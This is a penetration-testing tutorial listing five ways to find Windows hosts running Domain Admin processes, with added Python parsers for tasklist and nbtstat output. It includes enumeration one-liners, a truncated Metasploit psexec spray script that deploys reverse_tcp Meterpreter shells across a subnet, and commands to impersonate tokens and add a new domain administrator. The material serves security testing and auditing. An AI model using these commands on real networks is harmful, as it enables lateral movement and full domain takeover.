Objective
When a computer is joined to a domain, the Domain Admins group is granted local administrator rights on it by default. That is, in the process of joining a computer to the domain and making it a member host, the Domain Admins group is automatically added to the computer's local Administrators group. As a result, members of the Domain Admins group can log on to that computer with Full Control permissions.
So for penetration testers, the Domain Admins group's membership in the local Administrators group is a common way to impersonate the domain administrator account. The premise, however, is that they need to know which systems those domain admin processes are running on. This article presents five ways to find the processes that Domain Admins are running; the techniques involved include:
1. Local inspection;
2. Querying domain controllers for active domain user sessions;
3. Scanning remote systems for running tasks;
4. Scanning remote systems for NetBIOS information;
5. PsExec shell spraying of remote systems to check for authentication tokens.
Getting Domain Admin privileges
For the most part, this article focuses on finding the systems that are running domain admin processes. Even so, I'd like to first outline the standard procedure that penetration testers use to obtain domain administrator privileges:
1. Identify target systems and applications;
2. Identify potential vulnerabilities;
3. Exploit a vulnerability to obtain initial access;
4. Escalate privileges on the compromised system;
5. Locate domain admin processes or authentication tokens on the local or remote systems;
6. Authenticate to the remote system running the domain admin process by passing the local administrator's password hash, cracking the password, or dumping the password with a tool such as Mimikatz;
7. Migrate into the domain admin process;
8. Create a new domain admin account.
The above is the common sequence of steps in a penetration test, so there is no need to go into more detail. If you are interested in the details, there are plenty of tutorials on the Internet.
Finding domain admin processes
Here are five techniques I've gathered from the web for finding domain admin processes.
Technique 1: Local inspection
Be sure to check the initially compromised system first: if a domain admin process is already running there, there is no point in going out across the network. Here's a simple way to check for running domain admin processes using native commands:
1. Run the following command to get the list of Domain Admins: net group "Domain Admins" /domain
2. Run the tasklist /v command to list the processes and the users running them; the account that runs each process is in the 7th column;
3. Cross-reference the task list against the Domain Admins list to see whether any domain admin processes are running.
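As an added example (not code from the original article), here is a Python script that performs the three steps above against the output of the two native commands, so the same check can be run by a defender auditing where Domain Admin accounts are exposed on a host. It assumes tasklist is invoked with /fo csv so that the "User Name" column (the 7th) can be parsed reliably; the net group and tasklist outputs embedded in it are constructed samples, not captures from a real host.

```python
"""Cross-reference local process owners against the Domain Admins group.

Added example, not code from the original article.  It performs the three
manual steps of the local-inspection technique:
  1. parse the output of   net group "Domain Admins" /domain
  2. parse the output of   tasklist /v /fo csv   ("User Name" is column 7)
  3. report processes owned by a Domain Admins member
Both sample outputs below are constructed, not captured from a real host.
"""
import csv
import io
import re
import subprocess

# Constructed sample of: net group "Domain Admins" /domain
NET_GROUP_OUTPUT = """\
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            joe-admin                bill-admin
david-admin
The command completed successfully.
"""

# Constructed sample of: tasklist /v /fo csv  (CSV avoids the fixed-width
# layout of plain `tasklist /v`, where long user names can shift columns)
TASKLIST_CSV = """\
"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"svchost.exe","812","Services","0","9,532 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:01","N/A"
"explorer.exe","2204","Console","1","61,004 K","Running","COMPANY\\jsmith","0:00:12","N/A"
"cmd.exe","3316","RDP-Tcp#0","2","3,120 K","Running","COMPANY\\joe-admin","0:00:00","Administrator: cmd.exe"
"mmc.exe","4100","RDP-Tcp#0","2","22,480 K","Running","COMPANY\\JOE-ADMIN","0:00:03","Active Directory Users and Computers"
"cmd.exe","4288","Console","1","3,040 K","Running","WS01\\Administrator","0:00:00","cmd.exe"
"""


def parse_domain_admins(text):
    """Return the lower-cased member names printed by `net group ... /domain`.

    Members appear after the dashed separator line, several per line, until
    the trailing status line.  Account names containing spaces would be split
    here; for those, an LDAP query of the group is the safer source.
    """
    members = set()
    in_members = False
    for line in text.splitlines():
        if re.fullmatch(r"-{5,}", line.strip()):
            in_members = True
            continue
        if line.startswith("The command completed"):
            break
        if in_members:
            members.update(name.lower() for name in line.split())
    return members


def parse_process_owners(csv_text):
    """Yield (image, pid, domain, user) for each row of `tasklist /v /fo csv`."""
    for row in csv.DictReader(io.StringIO(csv_text)):
        domain, _, user = row["User Name"].rpartition("\\")
        yield row["Image Name"], int(row["PID"]), domain, user


def find_domain_admin_processes(tasklist_csv, net_group_output, domain):
    """Return (image, pid, owner) for processes owned by a Domain Admins member.

    Both the account name and the domain prefix must match, so a local
    account that happens to share a name with a domain admin (for example a
    local Administrator) is not reported.
    """
    admins = parse_domain_admins(net_group_output)
    hits = []
    for image, pid, owner_domain, user in parse_process_owners(tasklist_csv):
        if owner_domain.lower() == domain.lower() and user.lower() in admins:
            hits.append((image, pid, f"{owner_domain}\\{user}"))
    return hits


def collect_live(domain):
    """Run the two native commands on a Windows host and cross-reference them."""
    net = subprocess.run(["net", "group", "Domain Admins", "/domain"],
                         capture_output=True, text=True, check=True).stdout
    tasks = subprocess.run(["tasklist", "/v", "/fo", "csv"],
                           capture_output=True, text=True, check=True).stdout
    return find_domain_admin_processes(tasks, net, domain)


if __name__ == "__main__":
    # Sample run against the constructed data; collect_live("COMPANY") would
    # do the same against the real commands on a domain-joined Windows host.
    for image, pid, owner in find_domain_admin_processes(TASKLIST_CSV, NET_GROUP_OUTPUT, "COMPANY"):
        print(f"[!] {owner} is running {image} (PID {pid})")
```

The comparison keys on both the account name and the domain prefix, so the local WS01\Administrator in the sample is not mistaken for the domain Administrator account that appears in the Domain Admins list; that distinction is easy to miss when eyeballing tasklist output with findstr.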
It would be great if a domain admin process were always running on the initially compromised system, but that is the ideal case. The next four techniques help you find domain admin processes on remote domain systems in a variety of situations.
Technique 2: Querying domain controllers for active domain user sessions
As far as I know, this technique originated at the security company NetSPI. We needed a way to identify domain admin processes and logins without shell spraying across the network or running any scan that would trigger an intrusion detection system. In the end, I found that simply querying a list of active domain user sessions and cross-referencing that list with the Domain Admins list works. The only drawback is that you have to query every domain controller. Here are the basic steps I use to get a list of systems with active domain admin sessions, using only domain user rights.
1. Use an LDAP query or the net command to collect a list of domain controllers from the Domain Controllers OU. The following is the net command I use:
net group "Domain Controllers" /domain
Note: Although the OU is the best source for a list of domain controllers, you will also want to enumerate the domain controllers of trusted domains when going through this process. Alternatively, you can find them through DNS: nslookup -type=srv _ldap._tcp.
2. Use an LDAP query or the net command to collect a list of domain administrators from the Domain Admins group. Here is the net command I use:
net group "Domain Admins" /domain
3. Collect a list of all active domain sessions by querying each domain controller with netsess.exe. Netsess is a great tool written by Joe Richards that wraps the native Windows function NetSessionEnum. This function returns the IP address, domain account, session start time and idle time of each active session. Here is the command I use:
netsess.exe -h
4. Cross-reference the Domain Admins list against the active session list to determine which IP addresses have active domain admin tokens. In more secure environments, you may have to wait for a domain administrator, or a service account with Domain Admin privileges, to do something on the network. That means running the process many times, or scripting it. Here is a quick and dirty Windows command-line script that uses netsess:
for /f %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt && for /f %a in (admins.txt) do @type sessions.txt | @findstr /I %a
Note that dcs.txt contains the list of domain controllers and admins.txt contains the Domain Admins list.
To simplify this, I wrote a basic batch script called Get Domain Admins (GDA) that automates the entire process. The README file lists its dependencies. I also created a batch file called Get Domain Users (GDU) for Windows dictionary attacks, with options similar to GDA, but with more dependencies. If you are interested, you can download them from the link above.
Technique 3: Scanning remote systems for running tasks
In general, the first two methods are enough to guarantee success. But there is always another way, and this third technique, which I saw on LaNMSteR53's blog, is a clever one. When you are running as a shared local administrator account on domain systems, you can scan those systems for domain admin tasks with the following script. As with the previous techniques, you need to enumerate the Domain Admins first. In the script below, ips.txt contains the list of target systems and names.txt contains the list of domain administrators.
for /f %i in (ips.txt) do @echo [+] %i && @tasklist /V /S %i /U user /P password 2>nul > output.txt && for /f %n in (names.txt) do @type output.txt | findstr %n > NUL && echo [!] %n is found running a process on %i && pause
Technique 4: Scanning remote systems for NetBIOS information
Some Windows systems still let users query the logged-on user over NetBIOS. You can use the native nbtstat tool for this; in nbtstat output, the user name is listed with the <03> suffix.
1. Here is another quick and dirty Windows command-line script that scans remote systems for active Domain Admin sessions. Note: this script can be run as a non-domain user.
for /f %i in (ips.txt) do @echo [+] Checking %i && nbtstat -a %i 2>nul > nbsessions.txt && for /f %n in (admins.txt) do @type nbsessions.txt | findstr /i %n > NUL && echo [!] %n was found logged into %i
2. You can also use the slightly faster nbtscan tool; here is another basic script for it:
for /f %i in (ips.txt) do @echo [+] Checking %i && nbtscan -f %i 2>nul > nbsessions.txt && for /f %n in (admins.txt) do @type nbsessions.txt | findstr /i %n > NUL && echo [!] %n was found logged into %i
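As an added example (not from the original article), the following Python code parses the NetBIOS name table returned by nbtstat -a and matches the logged-on names against an admins.txt list, which is the same check a defender can use to audit which hosts still expose logged-on privileged accounts over NetBIOS (hosts with NetBIOS over TCP/IP disabled simply return no table). It handles two details that the one-line findstr scripts above gloss over: the computer's own name is also registered with the <03> suffix and must be dropped, and NetBIOS names are upper-cased and limited to 15 characters, so longer account names are compared on their first 15 characters. The nbtstat output and admins.txt contents are constructed samples; the nbtscan output format is not covered here.

```python
"""Extract logged-on user names from `nbtstat -a <host>` output and match
them against a Domain Admins list.

Added example, not code from the original article.  The NetBIOS name table
contains a <03> UNIQUE record both for the computer itself and for each
logged-on user, so the computer's own <00> UNIQUE name is filtered out.
NetBIOS names are upper-cased and at most 15 characters long, so account
names are normalised the same way before comparison.  Both inputs below
are constructed samples.
"""
import re

# Constructed sample of: nbtstat -a 192.168.1.50
NBTSTAT_OUTPUT = """\
Local Area Connection:
Node IpAddress: [192.168.1.50] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WS01           <00>  UNIQUE      Registered
    COMPANY        <00>  GROUP       Registered
    WS01           <20>  UNIQUE      Registered
    COMPANY        <1E>  GROUP       Registered
    WS01           <03>  UNIQUE      Registered
    JOE-ADMIN      <03>  UNIQUE      Registered
    DAVID-ADMINISTR <03>  UNIQUE      Registered

    MAC Address = 00-0C-29-AB-CD-EF
"""

# Constructed admins.txt contents: one Domain Admin account name per line
ADMINS_TXT = "Administrator\njoe-admin\nbill-admin\ndavid-administrator\n"

# One row of the name table: name, two-hex-digit suffix, UNIQUE/GROUP, status
NBT_ROW = re.compile(
    r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+Registered", re.M)


def parse_nbt_table(text):
    """Return (name, suffix, type) tuples for every registered name."""
    return [(m.group(1), m.group(2).upper(), m.group(3))
            for m in NBT_ROW.finditer(text)]


def logged_on_users(text):
    """Names registered as <03> UNIQUE, minus the computer's own name(s)."""
    rows = parse_nbt_table(text)
    computer_names = {n for n, s, t in rows if s == "00" and t == "UNIQUE"}
    return [n for n, s, t in rows
            if s == "03" and t == "UNIQUE" and n not in computer_names]


def netbios_form(account):
    """NetBIOS form of an account name: upper-cased, truncated to 15 chars."""
    return account.strip().upper()[:15]


def match_domain_admins(nbtstat_text, admins_txt):
    """Return (netbios_name, account) pairs for logged-on Domain Admins."""
    admins = {netbios_form(a): a.strip()
              for a in admins_txt.splitlines() if a.strip()}
    return [(n, admins[n]) for n in logged_on_users(nbtstat_text) if n in admins]


if __name__ == "__main__":
    for netbios_name, account in match_domain_admins(NBTSTAT_OUTPUT, ADMINS_TXT):
        print(f"[!] {account} (NetBIOS name {netbios_name}) is logged on")
```

A plain findstr for "david-administrator" would never match the table above, because the registered name is cut at 15 characters; normalising the admin list the same way is what makes the comparison reliable. The filter on the computer's own <00> name matters in the other direction: without it, a workstation named after an administrator would produce a false hit.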
Technique 5: PsExec shell spraying remote systems for authentication tokens
PsExec "shell spraying" means using the psexec module in Metasploit with shared local administrator credentials to install a shell (usually Meterpreter) on hundreds of systems. Many testers use this method together with other Metasploit features to identify domain admin tokens. Although this is my least favorite technique, I feel I have to include it because a lot of people in the pentest community actively use it. Note, however, that starting 500 shells at the same time in a production environment can cause problems for the customer's systems. On the other hand, having 500 shells means you can get the data faster. Here are the steps I've seen many people use:
1. Install Metasploit 3.5 or later;
2. Copy the following script into a text file and save it in the Metasploit directory as psexec_spray.rc. This is a script I originally found on Jabra's blog.
#Setup multi handler to accept multiple incoming connections
use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 0.0.0.0
setg LPORT 55555
set ExitOnSession false
exploit -j -z
#Setup credentials for windows/smb/psexec
use windows/smb/psexec
set SMBUser <user>
set SMBPass <password>
#SMBDomain defaults to the local host; set it only when using domain credentials
#Disable the payload handler in the psexec module (the multi handler above is used instead)
set DisablePayloadHandler true
#Run Ruby code using the Rex API RangeWalker to scan the desired network range
#Note: it could also accept IP addresses from a file by replacing rhosts = '192.168.74.0/24' with rhosts = File.readlines("C:\systems.txt")
require 'rex/socket/range_walker'
3. Update the SMBUser and SMBPass parameters;
4. Run msfconsole -r psexec_spray.rc to execute the script. The psexec_spray.rc script will attempt to install a Meterpreter shell on every system in the 192.168.1.0/24 network using the credentials provided.
5. You can then use the token_hunter Metasploit module to identify domain admin tokens on each system with a shell. The steps are as follows:
5.1 Create a file containing the list of Domain Admins, one per line, for example:
company\joe-admin
company\bill-admin
company\david-admin
5.2 Load the token_hunter module in msfconsole: msf> load token_hunter
5.3 Run token_hunt_user to list the sessions that hold a domain admin token: msf> token_hunt_user -f /tmp/domain-admin.txt
6. Alternatively, you can use the sessions -s loggedin command to get a list of currently logged-in users from each system with a shell and look for Domain Admins manually.
Adding a new domain administrator
If you have already obtained a Meterpreter session, you can use the Incognito extension to impersonate a domain administrator or to add a new domain administrator. Incognito iterates through all of the delegation tokens available on the system and attempts to add a new domain administrator with each of them. The following are the basic commands to do this in Meterpreter:
1. Load the Incognito extension in your active Meterpreter session with the load incognito command;
2. Try to add a domain administrator using an authentication token on the system with the following commands:
add_user -h
add_group "Domain Admins" -h
If you would rather create a new domain administrator another way, you can use the following steps:
1. In the Meterpreter console, enter the ps command to list the processes;
2. In the Meterpreter console, locate a domain admin process and migrate into it with the migrate command;
3. In the Meterpreter console, enter the shell command to get an OS shell;
4. Enter the following native Windows commands to add a new domain administrator:
net user /add /domain
net group "Domain Admins" /add /domain
Summary
As described in this article, there are a number of options for identifying domain admin processes and authentication tokens. I suggest using the methods that have the least impact on the systems involved, and I trust that people will come up with better ideas over time.
Five ways to find the process that "Domain Admin" is running